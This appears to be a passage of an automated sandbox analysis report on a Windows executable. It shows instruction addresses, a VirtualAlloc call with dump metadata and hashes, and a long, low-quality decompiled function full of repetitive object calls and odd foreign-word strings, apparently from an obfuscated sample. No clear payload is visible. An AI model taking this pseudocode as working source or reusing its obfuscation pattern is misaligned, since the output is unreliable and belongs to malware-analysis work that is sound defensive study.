                              0x004042ea
                              0x004042ee
                              0x004042f2
                              0x004042f6
                              0x004042fa
                              0x00404301
                              0x00404305
                              0x0040430c
                              0x0040430d
                              0x00404310
                              0x00404313
                              0x00404318
                              0x0040431c
                              0x00404325
                              0x00404329
                              0x00404333
                              0x00404337
                              0x00404341
                              0x0040434b
                              0x0040434f
                              0x00404356
                              0x00404359
                              0x0040435d
                              0x0040436c
                              0x0040436d
                              0x00404374
                              0x00404375
                              0x0040437f
                              0x00404380
                              0x00404387
                              0x0040438b
                              0x0040438f
                              0x00404392
                              0x00404395
                              0x0040439a
                              0x0040439b
                              0x0040439e
                              0x004043a2
                              0x004043a4
                              0x004043a8
                              0x004043a9
                              0x004043ab
                              0x004043af
                              0x004043b3
                              0x004043b8
                              0x004043bb
                              0x004043be
                              0x004043c2
                              0x004043c4
                              0x004043c8
                              0x004043cb
                              0x004043ce
                              0x004043ce
                              0x004043d2
                              0x004043d6
                              0x004043d9
                              0x004043dd
                              0x004043e1
                              0x004043e8
                              0x004043ec
                              0x004043ed
                              0x004043f0
                              0x004043f3
                              0x004043f6
                              0x004043fa
                              0x004043fd
                              0x00404400
                              0x00404403
                              0x00404407
                              0x0040440f
                              0x00404413
                              0x0040441a
                              0x0040441c
                              0x00404423
                              0x00404424
                              0x00404429

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000DCC0,-00001AAF,FFFFFE81), ref: 004043A9
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 33972f3117a725427e94972bf1cc3be1d286ca26c4fa00ce4e40ef8a658310da
                              • Instruction ID: 41b9a419ad3a023a2ad9b9fa3b9eef85bc03cf1a808b3134c611ba04385da900
                              • Opcode Fuzzy Hash: 33972f3117a725427e94972bf1cc3be1d286ca26c4fa00ce4e40ef8a658310da
                              • Instruction Fuzzy Hash: 107186B2808618AFEBC45E70C5897A97BF0FF103A9F926519FC8652091D7BD89C58BC1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040E60A, Relevance: 340.0, APIs: 182, Strings: 11, Instructions: 2220COMMON
                              Download Yara Rule
                              C-Code - Quality: 56%
                              			E0040E60A(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v40;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long long _v60;
				char _v64;
				long long _v72;
				void* _v88;
				short _v92;
				signed int _v96;
				void* _v112;
				signed int _v120;
				signed int _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v168;
				char _v176;
				intOrPtr _v184;
				char _v192;
				char _v200;
				char _v208;
				char* _v216;
				char _v224;
				char* _v232;
				intOrPtr _v240;
				intOrPtr _v248;
				intOrPtr _v256;
				char _v260;
				char _v264;
				char _v268;
				void* _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				char _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				intOrPtr* _v556;
				signed int _v560;
				intOrPtr* _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr* _v576;
				signed int _v580;
				intOrPtr* _v584;
				signed int _v588;
				intOrPtr* _v592;
				signed int _v596;
				intOrPtr* _v600;
				signed int _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
				intOrPtr* _v636;
				signed int _v640;
				intOrPtr* _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				intOrPtr* _v684;
				signed int _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				intOrPtr* _v704;
				signed int _v708;
				signed int _v712;
				intOrPtr* _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _t1111;
				signed int _t1118;
				signed int _t1126;
				signed int _t1130;
				char* _t1134;
				signed int _t1138;
				signed int _t1143;
				signed int _t1147;
				signed int _t1166;
				signed int _t1170;
				signed int* _t1175;
				signed int _t1179;
				signed int _t1183;
				signed int _t1187;
				signed int _t1192;
				signed int _t1196;
				char* _t1200;
				signed int _t1204;
				char* _t1206;
				char* _t1209;
				signed int _t1219;
				signed int _t1233;
				signed int _t1237;
				char* _t1241;
				signed int _t1245;
				signed int _t1249;
				signed int _t1253;
				signed int _t1257;
				signed int _t1261;
				char* _t1266;
				signed int _t1270;
				signed int _t1274;
				signed int _t1278;
				char* _t1283;
				signed int _t1289;
				signed int _t1304;
				signed int _t1309;
				signed int _t1313;
				char* _t1317;
				signed int _t1321;
				signed int _t1325;
				signed int _t1329;
				signed int _t1337;
				signed int _t1344;
				signed int _t1348;
				char* _t1352;
				signed int _t1356;
				signed int _t1360;
				signed int _t1364;
				signed int _t1368;
				signed int _t1372;
				char* _t1376;
				signed int _t1380;
				signed int _t1393;
				signed int _t1409;
				signed int _t1413;
				signed int* _t1418;
				signed int _t1422;
				signed int _t1426;
				signed int _t1430;
				signed int _t1434;
				signed int _t1438;
				char* _t1442;
				signed int _t1446;
				signed int _t1451;
				signed int _t1455;
				char* _t1458;
				char* _t1460;
				signed int _t1481;
				signed int _t1485;
				char* _t1489;
				signed int _t1493;
				signed int _t1497;
				signed int _t1501;
				signed int _t1515;
				signed int _t1524;
				signed int _t1528;
				char* _t1532;
				signed int _t1536;
				signed int _t1543;
				signed int _t1550;
				signed int _t1554;
				char* _t1558;
				signed int _t1562;
				signed int _t1570;
				signed int _t1575;
				void* _t1583;
				signed int _t1587;
				signed int _t1591;
				char* _t1596;
				char* _t1608;
				intOrPtr _t1671;
				intOrPtr _t1712;
				signed int* _t1720;
				void* _t1756;
				void* _t1758;
				intOrPtr* _t1759;
				intOrPtr* _t1760;
				void* _t1762;
				void* _t1763;
				void* _t1764;
				void* _t1766;
				void* _t1767;
				void* _t1769;
				void* _t1770;
				void* _t1772;
				void* _t1773;
				void* _t1774;
				void* _t1776;
				long long* _t1777;
				long long* _t1778;

				_t1759 = _t1758 - 0x18;
				 *[fs:0x0] = _t1759;
				L004012E0();
				_v28 = _t1759;
				_v24 = 0x401128;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t1756);
				_v8 = 1;
				_v8 = 2;
				_push( &_v176);
				L00401442();
				_v216 = L"udsanering";
				_v224 = 0x8008;
				_push( &_v176);
				_t1111 =  &_v224;
				_push(_t1111);
				L00401448();
				_v312 = _t1111;
				_t1596 =  &_v176;
				L0040143C();
				if(_v312 != 0) {
					_v8 = 3;
					if( *0x413010 != 0) {
						_v412 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x402b88);
						L0040142A();
						_v412 = 0x413010;
					}
					_t1587 =  &_v132;
					L00401430();
					_v312 = _t1587;
					_t1591 =  *((intOrPtr*)( *_v312 + 0x158))(_v312,  &_v120, _t1587,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x300))( *_v412));
					asm("fclex");
					_v316 = _t1591;
					if(_v316 >= 0) {
						_v416 = _v416 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403aec);
						_push(_v312);
						_push(_v316);
						L0040145A();
						_v416 = _t1591;
					}
					_v384 = _v120;
					_v120 = _v120 & 0x00000000;
					_v168 = _v384;
					_v176 = 8;
					_push( &_v176);
					L00401436();
					L0040144E();
					_t1596 =  &_v176;
					L0040143C();
				}
				_v8 = 5;
				_v232 = L"SMAAKRAVLET";
				_v240 = 8;
				_v168 = 0x46bb55;
				_v176 = 3;
				_v276 = 0x770254;
				 *_t1759 =  *0x4011f8;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1118 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v276, 0x15f3f,  &_v176, 0x10, _t1596);
				_v312 = _t1118;
				if(_v312 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x403928);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v420 = _t1118;
				}
				L0040143C();
				_v8 = 6;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v300);
				_v72 = _v300;
				_v8 = 7;
				if( *0x413010 != 0) {
					_v424 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v424 = 0x413010;
				}
				_t1126 =  &_v132;
				L00401430();
				_v312 = _t1126;
				_t1130 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1126,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x304))( *_v424));
				asm("fclex");
				_v316 = _t1130;
				if(_v316 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v428 = _t1130;
				}
				if( *0x413010 != 0) {
					_v432 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v432 = 0x413010;
				}
				_t1134 =  &_v136;
				L00401430();
				_v320 = _t1134;
				_t1138 =  *((intOrPtr*)( *_v320 + 0x130))(_v320,  &_v140, _t1134,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x30c))( *_v432));
				asm("fclex");
				_v324 = _t1138;
				if(_v324 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v436 = _t1138;
				}
				_push(0);
				_push(0);
				_push(_v140);
				_push( &_v192); // executed
				L00401424(); // executed
				_t1760 = _t1759 + 0x10;
				if( *0x413010 != 0) {
					_v440 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v440 = 0x413010;
				}
				_t1143 =  &_v144;
				L00401430();
				_v328 = _t1143;
				_t1147 =  *((intOrPtr*)( *_v328 + 0x118))(_v328,  &_v280, _t1143,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
				asm("fclex");
				_v332 = _t1147;
				if(_v332 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v444 = _t1147;
				}
				_v300 =  *0x4011f0;
				_v288 = 0x5f3676;
				L00401418();
				L0040141E();
				_v284 =  *0x4011e8;
				_v216 = L"BEMISTED";
				_v224 = 8;
				_t1608 =  &_v176;
				L00401412();
				_t144 =  &_v288; // 0x5f3676
				 *_t1760 = _v276;
				_v192 =  *0x4011e0;
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x5da19910, 0x5afc,  &_v176, _t1608, _t1608,  &_v284, _t1608,  &_v120, _v280, _t144,  &_v300, 0x7259,  &_v192);
				L0040140C();
				_push( &_v140);
				_push( &_v144);
				_push( &_v136);
				_push( &_v132);
				_push(4);
				L00401406();
				_push( &_v192);
				_push( &_v176);
				_push(2);
				L00401400();
				_t1762 = _t1760 + 0x20;
				_v8 = 8;
				if( *0x413010 != 0) {
					_v448 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v448 = 0x413010;
				}
				_t1166 =  &_v132;
				L00401430();
				_v312 = _t1166;
				_t1170 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1166,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x2fc))( *_v448));
				asm("fclex");
				_v316 = _t1170;
				if(_v316 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v452 = _t1170;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v176);
				L00401424();
				_t1763 = _t1762 + 0x10;
				if( *0x413010 != 0) {
					_v456 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v456 = 0x413010;
				}
				_t1175 =  &_v140;
				L00401430();
				_v320 = _t1175;
				_t1179 =  *((intOrPtr*)( *_v320 + 0x158))(_v320,  &_v120, _t1175,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x30c))( *_v456));
				asm("fclex");
				_v324 = _t1179;
				if(_v324 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v460 = _t1179;
				}
				if( *0x413010 != 0) {
					_v464 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v464 = 0x413010;
				}
				_t1183 =  &_v144;
				L00401430();
				_v328 = _t1183;
				_t1187 =  *((intOrPtr*)( *_v328 + 0x160))(_v328,  &_v148, _t1183,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x300))( *_v464));
				asm("fclex");
				_v332 = _t1187;
				if(_v332 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v468 = _t1187;
				}
				_push(0);
				_push(0);
				_push(_v148);
				_push( &_v208);
				L00401424();
				_t1764 = _t1763 + 0x10;
				if( *0x413010 != 0) {
					_v472 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v472 = 0x413010;
				}
				_t1192 =  &_v152;
				L00401430();
				_v336 = _t1192;
				_t1196 =  *((intOrPtr*)( *_v336 + 0x158))(_v336,  &_v124, _t1192,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x304))( *_v472));
				asm("fclex");
				_v340 = _t1196;
				if(_v340 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403aec);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v476 = _t1196;
				}
				if( *0x413010 != 0) {
					_v480 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v480 = 0x413010;
				}
				_t1200 =  &_v156;
				L00401430();
				_v344 = _t1200;
				_t1204 =  *((intOrPtr*)( *_v344 + 0x80))(_v344,  &_v276, _t1200,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x308))( *_v480));
				asm("fclex");
				_v348 = _t1204;
				if(_v348 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x403aec);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v484 = _t1204;
				}
				_v292 = _v276;
				_v288 = 0x84ac3;
				_v388 = _v124;
				_v124 = _v124 & 0x00000000;
				L0040141E();
				_t1206 =  &_v208;
				L004013FA();
				_v284 = _t1206;
				_v392 = _v120;
				_v120 = _v120 & 0x00000000;
				_v184 = _v392;
				_v192 = 8;
				_t1209 =  &_v176;
				L004013FA();
				_v280 = _t1209;
				_v216 = L"Tilsjoflingerne9";
				_v224 = 8;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1219 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x703af6, 0x56b32da0, 0x5b04, 0x10,  &_v280,  &_v192,  &_v284,  &_v128,  &_v288,  &_v292, _t1209, _t1206);
				_v352 = _t1219;
				if(_v352 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x403928);
					_push(_a4);
					_push(_v352);
					L0040145A();
					_v488 = _t1219;
				}
				L0040140C();
				_push( &_v148);
				_push( &_v136);
				_push( &_v156);
				_push( &_v152);
				_push( &_v144);
				_push( &_v140);
				_push( &_v132);
				_push(7);
				L00401406();
				_push( &_v208);
				_push( &_v192);
				_push( &_v176);
				_push(3);
				L00401400();
				_t1766 = _t1764 + 0x30;
				_v8 = 9;
				if( *0x413010 != 0) {
					_v492 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v492 = 0x413010;
				}
				_t1233 =  &_v132;
				L00401430();
				_v312 = _t1233;
				_t1237 =  *((intOrPtr*)( *_v312 + 0x60))(_v312,  &_v276, _t1233,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x308))( *_v492));
				asm("fclex");
				_v316 = _t1237;
				if(_v316 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v496 = _t1237;
				}
				if( *0x413010 != 0) {
					_v500 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v500 = 0x413010;
				}
				_t1241 =  &_v136;
				L00401430();
				_v320 = _t1241;
				_t1245 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1241,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x308))( *_v500));
				asm("fclex");
				_v324 = _t1245;
				if(_v324 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v504 = _t1245;
				}
				if( *0x413010 != 0) {
					_v508 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v508 = 0x413010;
				}
				_t1249 =  &_v140;
				L00401430();
				_v328 = _t1249;
				_t1253 =  *((intOrPtr*)( *_v328 + 0x138))(_v328,  &_v284, _t1249,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x300))( *_v508));
				asm("fclex");
				_v332 = _t1253;
				if(_v332 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v512 = _t1253;
				}
				if( *0x413010 != 0) {
					_v516 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v516 = 0x413010;
				}
				_t1257 =  &_v144;
				L00401430();
				_v336 = _t1257;
				_t1261 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1257,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x300))( *_v516));
				asm("fclex");
				_v340 = _t1261;
				if(_v340 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403aec);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v520 = _t1261;
				}
				_push(0);
				_push(0);
				_push(_v148);
				_push( &_v192);
				L00401424();
				_t1767 = _t1766 + 0x10;
				if( *0x413010 != 0) {
					_v524 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v524 = 0x413010;
				}
				_t1266 =  &_v152;
				L00401430();
				_v344 = _t1266;
				_t1270 =  *((intOrPtr*)( *_v344 + 0x118))(_v344,  &_v288, _t1266,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x30c))( *_v524));
				asm("fclex");
				_v348 = _t1270;
				if(_v348 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403aec);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v528 = _t1270;
				}
				if( *0x413010 != 0) {
					_v532 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					asm("enter 0xff1f, 0xff");
					_v532 = 0x413010;
				}
				_t1274 =  &_v156;
				L00401430();
				_v352 = _t1274;
				_t1278 =  *((intOrPtr*)( *_v352 + 0x178))(_v352,  &_v260, _t1274,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x30c))( *_v532));
				asm("fclex");
				_v356 = _t1278;
				if(_v356 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403aec);
					_push(_v352);
					_push(_v356);
					L0040145A();
					_v536 = _t1278;
				}
				_v200 = _v288;
				_v208 = 3;
				_v168 = _v284;
				_v176 = 3;
				_v216 = 0x2248ba;
				_v224 = 3;
				_v300 = 0x4edcc010;
				_v296 = 0x5af4;
				_t1283 =  &_v192;
				L00401418();
				L0040141E();
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1289 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v300, _v276, _v280, 0x10,  &_v176, _t1283, _t1283,  &_v208, _v260,  &_v264);
				_v360 = _t1289;
				if(_v360 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x403928);
					_push(_a4);
					_push(_v360);
					L0040145A();
					_v540 = _t1289;
				}
				_v92 = _v264;
				L0040140C();
				L00401406();
				L00401400();
				_t1769 = _t1767 + 0x30;
				_v8 = 0xa;
				_t1304 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v276, 3,  &_v176,  &_v192,  &_v208, 7,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152,  &_v156,  &_v148);
				_v312 = _t1304;
				if(_v312 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x403928);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v544 = _t1304;
				}
				_v64 = _v276;
				_v8 = 0xb;
				if( *0x413010 != 0) {
					_v548 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v548 = 0x413010;
				}
				_t1309 =  &_v132;
				L00401430();
				_v312 = _t1309;
				_t1313 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1309,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x30c))( *_v548));
				asm("fclex");
				_v316 = _t1313;
				if(_v316 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v552 = _t1313;
				}
				if( *0x413010 != 0) {
					_v556 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v556 = 0x413010;
				}
				_t1317 =  &_v136;
				L00401430();
				_v320 = _t1317;
				_t1321 =  *((intOrPtr*)( *_v320 + 0x140))(_v320,  &_v260, _t1317,  *((intOrPtr*)( *((intOrPtr*)( *_v556)) + 0x30c))( *_v556));
				asm("fclex");
				_v324 = _t1321;
				if(_v324 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v560 = _t1321;
				}
				if( *0x413010 != 0) {
					_v564 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v564 = 0x413010;
				}
				_t1325 =  &_v140;
				L00401430();
				_v328 = _t1325;
				_t1329 =  *((intOrPtr*)( *_v328 + 0x50))(_v328,  &_v120, _t1325,  *((intOrPtr*)( *((intOrPtr*)( *_v564)) + 0x308))( *_v564));
				asm("fclex");
				_v332 = _t1329;
				if(_v332 >= 0) {
					_v568 = _v568 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v568 = _t1329;
				}
				_v396 = _v120;
				_v120 = _v120 & 0x00000000;
				_v168 = _v396;
				_v176 = 8;
				_v264 = _v260;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1337 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, _v276,  &_v264, 0x10);
				_v336 = _t1337;
				if(_v336 >= 0) {
					_v572 = _v572 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x403928);
					_push(_a4);
					_push(_v336);
					L0040145A();
					_v572 = _t1337;
				}
				_push( &_v140);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L00401406();
				_t1770 = _t1769 + 0x10;
				L0040143C();
				_v8 = 0xc;
				if( *0x413010 != 0) {
					_v576 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v576 = 0x413010;
				}
				_t1344 =  &_v132;
				L00401430();
				_v312 = _t1344;
				_t1348 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1344,  *((intOrPtr*)( *((intOrPtr*)( *_v576)) + 0x30c))( *_v576));
				asm("fclex");
				_v316 = _t1348;
				if(_v316 >= 0) {
					_v580 = _v580 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x403aec);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v580 = _t1348;
				}
				if( *0x413010 != 0) {
					_v584 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v584 = 0x413010;
				}
				_t1352 =  &_v136;
				L00401430();
				_v320 = _t1352;
				_t1356 =  *((intOrPtr*)( *_v320 + 0x48))(_v320,  &_v120, _t1352,  *((intOrPtr*)( *((intOrPtr*)( *_v584)) + 0x308))( *_v584));
				asm("fclex");
				_v324 = _t1356;
				if(_v324 >= 0) {
					_v588 = _v588 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403aec);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v588 = _t1356;
				}
				if( *0x413010 != 0) {
					_v592 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v592 = 0x413010;
				}
				_t1360 =  &_v140;
				L00401430();
				_v328 = _t1360;
				_t1364 =  *((intOrPtr*)( *_v328 + 0x68))(_v328,  &_v280, _t1360,  *((intOrPtr*)( *((intOrPtr*)( *_v592)) + 0x308))( *_v592));
				asm("fclex");
				_v332 = _t1364;
				if(_v332 >= 0) {
					_v596 = _v596 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403aec);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v596 = _t1364;
				}
				if( *0x413010 != 0) {
					_v600 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v600 = 0x413010;
				}
				_t1368 =  &_v144;
				L00401430();
				_v336 = _t1368;
				_t1372 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1368,  *((intOrPtr*)( *((intOrPtr*)( *_v600)) + 0x30c))( *_v600));
				asm("fclex");
				_v340 = _t1372;
				if(_v340 >= 0) {
					_v604 = _v604 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403aec);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v604 = _t1372;
				}
				if( *0x413010 != 0) {
					_v608 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v608 = 0x413010;
				}
				_t1671 =  *((intOrPtr*)( *_v608));
				_t1376 =  &_v152;
				L00401430();
				_v344 = _t1376;
				_t1380 =  *((intOrPtr*)( *_v344 + 0x108))(_v344,  &_v124, _t1376,  *((intOrPtr*)(_t1671 + 0x304))( *_v608));
				asm("fclex");
				_v348 = _t1380;
				if(_v348 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403aec);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v612 = _t1380;
				}
				_v400 = _v124;
				_v124 = _v124 & 0x00000000;
				_v184 = _v400;
				_v192 = 8;
				_v404 = _v148;
				_v148 = _v148 & 0x00000000;
				_v168 = _v404;
				_v176 = 9;
				_v288 = 0x24158f;
				_v284 = _v276;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v728 =  *0x4011d8;
				_t1393 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v284, _v120, _t1671, _t1671, _v280,  &_v288, 0x10,  &_v192, 0xf0230230, 0x5afa,  &_v208);
				_v352 = _t1393;
				if(_v352 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x403928);
					_push(_a4);
					_push(_v352);
					L0040145A();
					_v616 = _t1393;
				}
				L004013F4();
				L0040140C();
				L00401406();
				L00401400();
				_t1772 = _t1770 + 0x24;
				_v8 = 0xd;
				L004013EE();
